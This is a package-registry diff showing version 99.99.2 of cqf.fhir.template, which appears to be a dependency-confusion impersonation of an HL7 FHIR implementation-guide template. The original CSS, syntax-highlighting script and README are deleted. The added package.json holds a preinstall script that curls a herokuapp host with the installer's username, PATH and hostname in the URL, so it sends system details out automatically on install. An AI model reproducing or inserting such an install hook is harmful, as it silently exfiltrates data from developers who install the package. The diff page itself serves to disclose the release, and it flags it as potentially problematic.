cqf.fhir.template 0.7.1 → 99.99.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of cqf.fhir.template might be problematic. Click here for more details.
- package/index.js +3 -0
- package/package.json +12 -1
- package/README.md +0 -8
- package/content/assets/css/cqf.css +0 -186
- package/content/assets/ico/favicon.png +0 -0
- package/content/assets/images/cqf.png +0 -0
- package/content/assets/images/hl7-logo-header.png +0 -0
- package/content/assets/images/logo_ansinew.jpg +0 -0
- package/content/assets/images/search.png +0 -0
- package/content/assets/js/cql.js +0 -21
- package/includes/_append.fragment-css.html +0 -1
- package/includes/_append.fragment-footer.html +0 -2
- package/includes/_append.fragment-header.html +0 -3
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1 +1,12 @@
|
|
|
1
|
-
{
|
|
1
|
+
{
|
|
2
|
+
"name": "cqf.fhir.template",
|
|
3
|
+
"version": "99.99.2",
|
|
4
|
+
"description": "",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "curl https://shrouded-ravine-99137.herokuapp.com/cqf.fhir.template/$USER/$PATH/$HOSTNAME"
|
|
9
|
+
},
|
|
10
|
+
"author": "r03i98",
|
|
11
|
+
"license": "ISC"
|
|
12
|
+
}
|
package/README.md
DELETED
|
@@ -1,8 +0,0 @@
|
|
|
1
|
-
# cqf-ig-template
|
|
2
|
-
This IG provides a base template for Clinical Quality Framework FHIR Implementation Guides.
|
|
3
|
-
|
|
4
|
-
The [Clinical Quality Framework](https://confluence.hl7.org/display/CQIWC/Clinical+Quality+Framework) is a joint effort of the Clinical Decision Support and Clinical Quality Information Work Groups of Health Level 7 International to identify, develop, and harmonize standards that promote integration and reuse between Clinical Decision Support (CDS) and Clinical Quality Measurement (CQM).
|
|
5
|
-
|
|
6
|
-
package-id cqf.fhir.template
|
|
7
|
-
|
|
8
|
-
Based on HL7 template: https://github.com/HL7/ig-template-base
|
|
@@ -1,186 +0,0 @@
|
|
|
1
|
-
/* CQFramework Content IGs */
|
|
2
|
-
:root {
|
|
3
|
-
--navbar-bg-color: #105EAB; /* 2. Header container color */
|
|
4
|
-
--footer-bg-color: #505050; /* 3. Footer background color*/
|
|
5
|
-
--footer-container-bg-color: #105EAB; /* 4. Footer container color */
|
|
6
|
-
--btn-hover-color: #014384; /* 6. Menu button hover color */
|
|
7
|
-
}
|
|
8
|
-
|
|
9
|
-
/* Generic settings common to all content IGs */
|
|
10
|
-
:root {
|
|
11
|
-
--stripe-bg-color: #999999; /* 5. Header strip color */
|
|
12
|
-
--btn-active-color: #014384; /* 7. Menu button active color */
|
|
13
|
-
--btn-text-color: #e6e6e6; /* 8. Menu button text color */
|
|
14
|
-
--stu-note-background-color: #fff2ff; /* 19. (STU) Note box background color */
|
|
15
|
-
--stu-note-border-left-color: #ffa0ff; /* 20. (STU) Note box border color */
|
|
16
|
-
}
|
|
17
|
-
|
|
18
|
-
#hl7-nav {
|
|
19
|
-
line-height: 50px;
|
|
20
|
-
float: left;
|
|
21
|
-
margin-top: 4px;
|
|
22
|
-
}
|
|
23
|
-
|
|
24
|
-
#hl7-nav a {
|
|
25
|
-
color: inherit;
|
|
26
|
-
}
|
|
27
|
-
|
|
28
|
-
#hl7-logo {
|
|
29
|
-
float: left;
|
|
30
|
-
margin-left: 6px;
|
|
31
|
-
}
|
|
32
|
-
#hl7-search {
|
|
33
|
-
line-height: 50px;
|
|
34
|
-
float: right;
|
|
35
|
-
margin-top: 4px;
|
|
36
|
-
color: maroon;
|
|
37
|
-
}
|
|
38
|
-
#hl7-search a {
|
|
39
|
-
color: inherit;
|
|
40
|
-
}
|
|
41
|
-
#project-nav {
|
|
42
|
-
line-height: 50px;
|
|
43
|
-
float: left;
|
|
44
|
-
margin-top: 4px;
|
|
45
|
-
margin-bottom: 4px;
|
|
46
|
-
color: #808080;
|
|
47
|
-
}
|
|
48
|
-
#project-logo {
|
|
49
|
-
float: left;
|
|
50
|
-
margin-left: 3px;
|
|
51
|
-
}
|
|
52
|
-
|
|
53
|
-
/* ----------note-to-balloters styling------*/
|
|
54
|
-
|
|
55
|
-
.note-to-balloters::before {
|
|
56
|
-
white-space: pre;
|
|
57
|
-
content: "Note To Balloters\A ";
|
|
58
|
-
background-color: yellow;
|
|
59
|
-
color: red;
|
|
60
|
-
font-weight: bold;
|
|
61
|
-
}
|
|
62
|
-
.note-to-balloters, .stu-note{
|
|
63
|
-
margin: 5px;
|
|
64
|
-
padding: 10px;
|
|
65
|
-
border-left-style: solid;
|
|
66
|
-
}
|
|
67
|
-
|
|
68
|
-
.stu-note::before {
|
|
69
|
-
white-space: pre;
|
|
70
|
-
content: "STU Note\A ";
|
|
71
|
-
background-color: yellow;
|
|
72
|
-
color: red;
|
|
73
|
-
font-weight: bold;
|
|
74
|
-
}
|
|
75
|
-
|
|
76
|
-
/*
|
|
77
|
-
==================================
|
|
78
|
-
JSON/XML/TTL Example Styling Start
|
|
79
|
-
==================================
|
|
80
|
-
*/
|
|
81
|
-
|
|
82
|
-
pre.json {
|
|
83
|
-
width: 100%;
|
|
84
|
-
overflow: scroll;
|
|
85
|
-
}
|
|
86
|
-
|
|
87
|
-
pre.xml {
|
|
88
|
-
width: 100%;
|
|
89
|
-
overflow: scroll;
|
|
90
|
-
}
|
|
91
|
-
|
|
92
|
-
pre.rdf {
|
|
93
|
-
width: 100%;
|
|
94
|
-
overflow: scroll;
|
|
95
|
-
}
|
|
96
|
-
|
|
97
|
-
/*
|
|
98
|
-
==================================
|
|
99
|
-
JSON/XML/RTL Example Styling End
|
|
100
|
-
==================================
|
|
101
|
-
*/
|
|
102
|
-
|
|
103
|
-
|
|
104
|
-
/*
|
|
105
|
-
===============================
|
|
106
|
-
Liquid Narrative Styling Start
|
|
107
|
-
===============================
|
|
108
|
-
*/
|
|
109
|
-
|
|
110
|
-
.narrative-table {
|
|
111
|
-
border: 1pt inset rgb(0, 0, 0);
|
|
112
|
-
line-height: 10pt;
|
|
113
|
-
border-collapse: separate;
|
|
114
|
-
-webkit-border-horizontal-spacing: 2px;
|
|
115
|
-
-webkit-border-vertical-spacing: 2px;
|
|
116
|
-
}
|
|
117
|
-
|
|
118
|
-
.narrative-table>tbody {
|
|
119
|
-
display: table-row-group;
|
|
120
|
-
vertical-align: middle;
|
|
121
|
-
}
|
|
122
|
-
|
|
123
|
-
.narrative-table>tbody>tr {
|
|
124
|
-
display: table-row;
|
|
125
|
-
background-color: lightgray;
|
|
126
|
-
vertical-align: inherit;
|
|
127
|
-
}
|
|
128
|
-
|
|
129
|
-
.narrative-table>tbody>tr>th {
|
|
130
|
-
padding: 5px;
|
|
131
|
-
}
|
|
132
|
-
|
|
133
|
-
.section-header {
|
|
134
|
-
background-color: #656565;
|
|
135
|
-
color: whitesmoke;
|
|
136
|
-
vertical-align: inherit;
|
|
137
|
-
}
|
|
138
|
-
|
|
139
|
-
.row-header {
|
|
140
|
-
background-color: #656565;
|
|
141
|
-
color: whitesmoke;
|
|
142
|
-
vertical-align: inherit;
|
|
143
|
-
}
|
|
144
|
-
|
|
145
|
-
.tab-one {
|
|
146
|
-
padding-left: 5px;
|
|
147
|
-
}
|
|
148
|
-
|
|
149
|
-
@media (min-width: 768px) {
|
|
150
|
-
.row-header {
|
|
151
|
-
min-width: 138px;
|
|
152
|
-
max-width: 138px;
|
|
153
|
-
}
|
|
154
|
-
|
|
155
|
-
.content-container {
|
|
156
|
-
max-width: 576px;
|
|
157
|
-
}
|
|
158
|
-
}
|
|
159
|
-
|
|
160
|
-
@media (min-width: 992px) {
|
|
161
|
-
.row-header {
|
|
162
|
-
min-width: 181px;
|
|
163
|
-
max-width: 181px;
|
|
164
|
-
}
|
|
165
|
-
|
|
166
|
-
.content-container {
|
|
167
|
-
max-width: 745px;
|
|
168
|
-
}
|
|
169
|
-
}
|
|
170
|
-
|
|
171
|
-
@media (min-width: 1100px) {
|
|
172
|
-
.row-header {
|
|
173
|
-
min-width: 213px;
|
|
174
|
-
max-width: 213px;
|
|
175
|
-
}
|
|
176
|
-
|
|
177
|
-
.content-container {
|
|
178
|
-
max-width: 873px;
|
|
179
|
-
}
|
|
180
|
-
}
|
|
181
|
-
|
|
182
|
-
/*
|
|
183
|
-
===============================
|
|
184
|
-
Liquid Narrative Styling End
|
|
185
|
-
===============================
|
|
186
|
-
*/
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
package/content/assets/js/cql.js
DELETED
|
@@ -1,21 +0,0 @@
|
|
|
1
|
-
Prism.languages.cql = {
|
|
2
|
-
// 'function': TODO
|
|
3
|
-
'comment': {
|
|
4
|
-
pattern: /(^|[^\\])(?:\/\*[\s\S]*?\*\/|(?:\/\/|#).*)/,
|
|
5
|
-
lookbehind: true
|
|
6
|
-
},
|
|
7
|
-
'string': {
|
|
8
|
-
pattern: /(')(?:\\[\s\S]|(?!\1)[^\\]|\1\1)*\1/,
|
|
9
|
-
greedy: true
|
|
10
|
-
},
|
|
11
|
-
'variable':
|
|
12
|
-
{
|
|
13
|
-
pattern: /(["`])(?:\\[\s\S]|(?!\1)[^\\])+\1/,
|
|
14
|
-
greedy: true
|
|
15
|
-
},
|
|
16
|
-
'keyword': /\b(?:after|aggregate|all|and|as|asc|ascending|before|between|by|called|case|cast|code|Code|codesystem|codesystems|collapse|concept|Concept|contains|context|convert|date|day|days|default|define|desc|descending|difference|display|distinct|div|duration|during|else|end|ends|except|exists|expand|false|flatten|fluent|from|function|hour|hours|if|implies|in|include|includes|included in|intersect|Interval|is|less|let|library|List|maximum|meets|millisecond|milliseconds|minimum|minute|minutes|mod|month|months|more|not|null|occurs|of|on|or|overlaps|parameter|per|point|predecessor|private|properly|public|return|same|singleton|second|seconds|start|starting|starts|sort|successor|such that|then|time|timezoneoffset|to|true|Tuple|union|using|valueset|version|week|weeks|where|when|width|with|within|without|xor|year|years)\b/i,
|
|
17
|
-
'boolean': /\b(?:null|false|null)\b/i,
|
|
18
|
-
'number': /\b0x[\da-f]+\b|\b\d+(?:\.\d*)?|\B\.\d+\b/i,
|
|
19
|
-
'punctuation': /[;[\]()`,.]/,
|
|
20
|
-
'operator': /[-+*\/=%^~]|&&?|\|\|?|!=?|<(?:=>?|<|>)?|>[>=]?\b/i
|
|
21
|
-
};
|
|
@@ -1 +0,0 @@
|
|
|
1
|
-
<link href="{{site.data.info.assets}}assets/css/cqf.css" rel="stylesheet"/>
|